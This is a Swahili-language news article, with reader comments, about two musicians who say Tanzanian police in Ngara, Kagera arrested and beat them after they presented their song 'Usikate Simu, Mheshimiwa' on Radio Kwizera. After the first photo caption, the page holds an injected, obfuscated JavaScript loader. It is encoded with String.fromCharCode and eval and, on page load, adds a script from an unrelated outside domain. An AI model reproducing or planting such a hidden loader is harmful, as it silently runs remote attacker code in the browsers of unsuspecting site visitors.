Recent Comments

Kuvamiwa Kwa Wasanii Ngara – Kazi zao Kusambaa Ulimwenguni Kote

By Baraka Bitariho Nov 16, 2021
<p>Picha inaonyesha makovu msanii aliyorudi nayo nyumbani baada ya kuachiwa toka mikononi mwa polisi</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Tuliteswa sana na kosa bado hatulijui.
Uso wa msanii ulivyoonekana baada ya kutoka lock-up, Ngara Kagera Tanzania
Picha inaonyesha makovu msanii aliyorudi nayo nyumbani baada ya kuachiwa toka mikononi mwa polisi.
Mgongoni mwa msanii kumeonekana kuna makovu mengi – mara tuu baada ya kuachiwa huru uraiani, Ngara, Kagera Tanzania

Zifatazo ni picha za wasanii: Conrad na Alex, wanavyoonekana kabla hawakamatwa na kuwekwa lock up na polisi wa Tanzania

Wimbo wa Usikate Simu, Mheshimiwa ukitambulishwa, Studio Radio Kwizera, Ngara Kagera Tanzania
Ujuzi bora kabisa kwenye kinanda

 

Ule ubeti unaomshitua Mheshimiwa kuwa miradi yako haiendi sawa; inagomeshwa na marafiki ambao hawatimizi malengo bali kujaza mimba wafanyakazi.

 

 

Wimbo: Usikate Simu, Mheshimiwa – bofya hapa kuusikiliza

 

Kwa uchungu mkubwa, Conrad George Rutangantevyi, mmoja ya  wale wasanii waliopigwa na kushikiliwa bila kutarifiwa hatia na polisi wilayan Ngara, Kagera Tanzania, alisimulia kisa kilichomkuta pale mlangoni mwa geti la kituo cha radio, Kwizera.  “Nilikua natoka nje ya studio za radio kwizera niliposhitukia napigwa na polis na kufungwa pingu” bila kujua kosa nililokua nimelifanya, Rutangantevyi alielezea mtandao wa Simamia.com. Mimi na Alex Azimio Mchilo tulikua tumeenda kituoni hapo kufanya interview na kutambulisha wimbo wetu mpya kwa jamii unaoitwa Usikate Simu, Mheshimiwa.

 

 

Hii ndivyo msanii anavyoonekana aliyedai alipigwa na kuumizwa na polisi wa Tanzania, huko Ngara, Kagera.

 

 

 

Ni kawaida kwa vituo vya radio na television kupitia kazi ambazo zitatumika kabla ya program kuanza, Julia Kimati wa Voice Of America aliliambia gazeti la mtandaoni la simamia.com. Radio Kwizera kwa sifa nzuri walizonazo, ni lazima huu uchunguzi ulifanyika hata kabla ya hawa wasanii kuitwa kwenye interview na kama wangeona huu kazi haifai wasingeruhusu kipindi kiendelee. Baada ya kusikiliza huu wimbo, hawa vijana walitumia ubunifu mkubwa kuongelea kile kinachoonekana kwenye jamii, Kimati alieleza mtandao wa simamia.com.

 

Mwenzangu, Alex Azimio Mchilo alikuja kukamatwa baadaye na kuletwa lock-up. Kule lock up tuliteswa na mwenzangu hawakumtoa pingu mpaka saa sita usiku, Rutangantevyi alielezea kwa uchungu.  Mchilo alisema walipewa nafasi ya kutoa maelezo kesho yake na hapo changamoto hawakuwa na uhakika kama watoe maelezo ya maumivu waliyokuwa nayo na kulazwa ndani bila kuambiwa kosa.

 

Picha inaonyesha makovu msanii aliyorudi nayo nyumbani baada ya kuachiwa toka mikononi mwa polisi

Jeffrey Kashima ambaye anamalizia graduate degree ya sheria Murdoch University – Australia ameambia simamia.com kuwa ni wazi kuwa tarabitu za kukamata na kuweka mtu chini ya ulinzi hazikufatwa. Aliendelea kusema kuwa kuingizwa lock-up bila kutarifu aliyekamatwa ni teso tosha; na waliokamatwa kupewa karatasi siku iliyofata  baada ya kulala lock-up eti watoe maelezo ni saw ana mtu kunaswa kofi usoni na kulazimishwa atoe maelezo kwa maandishi. Ataandika nini hapo, jinsi ya kofi lilivyouma ama usingizi lock up bila godoro ulivyokua? – Kashima aliuza. Wasanii waliumizwa kisaikologia na wanafaa kupewa huduma ya afya na haki zao hasa kama walivyoeleza kuamulishwa kuwa wanariport polisi kila Jumatatu bila kujua wanalipoti polisi kwa kuwa ni waimbaji wanaoishi kijijini ama wanapaswa kuishi mjini kama vijana wengine wanaoimbia kutoka kwenye majiji makubwa, Jumanne Sendela wa Rusumo, Ngara alivyofikiria. Yaani inasikitisha vijana wanatangaza kwao, wanatoa maoni yao kwa viongozi wote wa siasa halafu wanaishia kuzawadiwa makovu ya kimwili na kisaikologia ambayo hawatokuja kusahau, Sendela aliongezea. Kila mwana Ngara amesikitishwa na uonezi mkubwa unaofanywa na polisi na tunategemea angalau mkuu wa Wilaya ya Ngara atoe msimamo maana haijulikani kama watazania waishio Ngara wanapaswa kuishi kwa hofu. Polisi wametowa wapi ujasiri wa kukamata mtu yoyote, wasimwambie kosa lake, wamlaze ndani na wagome kumtoa pingu? Hawa askari polisi waliohusika wanafaa kufukuzwa kazi na waliotoa amri Radio Kwizera kuwa nyimbo isipigwe watafute na wajumuishwe na mashitaka ili wawajibishwe. Haki ya hawa wasanii haitokuwa imepatikana kama hawa askari polisi wataendelea kuwa na kazi na hawa waliotoa amri kwa wataalamu wa Radio Kwizera eti wimbo usipigwe hawatopata kuonja lock up, Jamie Odongo wa Radio Uganda Boston ameeleza Simamia.com. Aliendelea kusema style za udictator kama hizi hazina nafasi tena kwenye jamii ya ulimwengu wa leo.

Mgongoni mwa msanii kumeonekana kuna makovu mengi – mara tuu baada ya kuachiwa huru uraiani, Ngara, Kagera Tanzania

Network ya mtandao wa Simamia.com ilibahatika kuwasiliana na ofisi ya ubarozi wa Tanzania mjini New York City – Umoja wa Mataifa juu ya swala la polisi wa Tanzania kuumiza watu pale inapowaweka chini ya Ulinzi. Ubarozi wa Tanzania ulisema kuwa tabia ya kutesa mtu hasa alikwisha kamatwa ni kinyume cha sheria za Tanzania. “Mtu amewekwa chini ya ulinzi halafu huo huo ulinzi unamletea majeraha, sasa huo ni ulinzi wa aina gani?” Ndugu Tenga aliuliza. Rais Samia Suluhu Hassan anazunguka ulimwengu akiinadi nchi kuwa ni huru, salama na inayofata sheria; vitendo kama hivi vinachafua yale mazuri Rais wetu anayotangazia ulimwengu. Ubarozi wa Tanzania New York City – Umoja wa Mataifa umeahidi kushughulikia hili swala. Msanii siku zote ni kioo cha jamii na “kazi zao ndizo huleta watalii, kwa hiyo kitengo chetu kinachoshughulikia maswala ya utalii,” kitafatilia kwa ukaribu hili swala la lililotokea Ngara, ofisa kwenye Ubarozi wa Tanzania ameiambia Simamia.

Uso wa msanii ulivyoonekana baada ya kutoka lock-up, Ngara Kagera Tanzania

Mtandao wa Simamia.com ulikusanya maoni ya watu 143 juu ya wimbo wa Usikate Simu, Mheshimiwa ambao wanaishi ndani na nje ya nchi ya Tanzania.  Hakuna hata mtu mmoja aliyeona tatizo la wimbo huu. Wengi waliousikiliza huu wimbo waliupenda sana. Wimbo wa Usikate Simu, Mheshimiwa unahamashisha mtu yoyote hasa yule alipo kwenye nafasi ya uongozi, siasa ama biashara angalialie (evaluate) ameshatimiza vitu gani kati ya vile alivyotegemea na kama alipofikia hapamridhishi basi afanye mabadiliko ili atomize malengo yake.

Wengine waliotoa maoni juu ya wimbo wa Usikate Simu, Mheshimiwa wameeleza simamia.com kuwa jina lenyewe linavutia kwani linasisitiza usiridhike, usikate tamaa (don’g give up). Kwa wale waliokuwa kwenye nafasi ya uongozi, hasa biashara, kuwa mwaka unakaribia kuisha huku tatizo la uviko 19 maarufu kama Covid19 linakwamisha mambo mengi yakiwemo ya kibiashara. Yaani ni mpaka mtu avamiwe ndipo sifa ya kazi zake zionekane, Bite Witonze ameeleza Simamia. Ameongeza kuwa kama waliodhani kuumiza hawa wasanii ndio dawa ya kuwaumiza, basi roho zao mbaya zimesaidia wimbo za hawa wasanii kusikiliza wimbo wao.

 

*Kwa wale wanaoona story zetu zimeegemea upande mmoja, basi tunawakaribisha kwenye ofisi za simamia.com zilizopo Kabanga kutoa upande wao wa story.

6 thoughts on “Kuvamiwa Kwa Wasanii Ngara – Kazi zao Kusambaa Ulimwenguni Kote”
  1. Hahaha, Baraka jitu gani hilo linajidanganya neno Mheshimiwa ni lake tuu? Huyo atakua mshamba, atakua hajafika hapa mjini ama kama amefika basi ni mtalii tuu.

    Huku kwetu Magomeni siku yenyewe usipomuita malaya mheshimiwa, huduma hupewi.

    Lilete huku tulitembeze mitaani ndio lichangamke. Wasanii pole sana kwa yaliyowakuta ila umarufu una ghalama zake. Epuka sana watu washamba na wajinga. Wao wanajiona ndio wao tuu kumbe matendo yao ni ujinga mtupu.

  2. Duh… huko Ngara ni mwisho wa dunia. Yani mtu anang’ang’ania uheshimiwa? Na bado mnanyenyekea na kumuita mheshimiwa? Kama mnatuma Bungeni anaenda kuzungumza nini, ngo’ombe na kilimo? Ama alzeti zinazoimbwaa?

    Mwambie aache ushamba bwana. Atulize, kuna maisha siasa zikiisha ama atang’ang’ania madara kama Banda wa Malawi? Na yeye alipokufa alizikwa kwenye udongo kama kibaka anavyozikwa. Ushamba ni mzigo.

  3. Poleni Sana wasanii, Ni muda sasa wa ninyi Kama team kupambana Mimi nafikiri safari yenu ndo imepamba moto na hiyo ndo milima na mabonde.
    Mungu atawaongoza msikate tamaa.

  4. Banka, you are doing a lot for your community. I am afraid you are bringing technology to a society that have not even mastered the analog world. Is it properly to say you are having jumping and calling a gun seat when the vehicle has not even started. When we are in Ngara Mjini, we see things up-side down and I see where you are coming from.

    It is sad the thugs that attacked the wasanii are still running rampantly and probably proclaiming threatening sentences to those questing this dis-speakable occurrences especially when the askari were involved. One who puts on a uniform ought to respect it otherwise it is a joke.

    Good job though, I read the article to remember my swahili classes in Moshi and I managed to grab all that I can. Will be in Ngara soon, we will get in touch.

Comments are closed.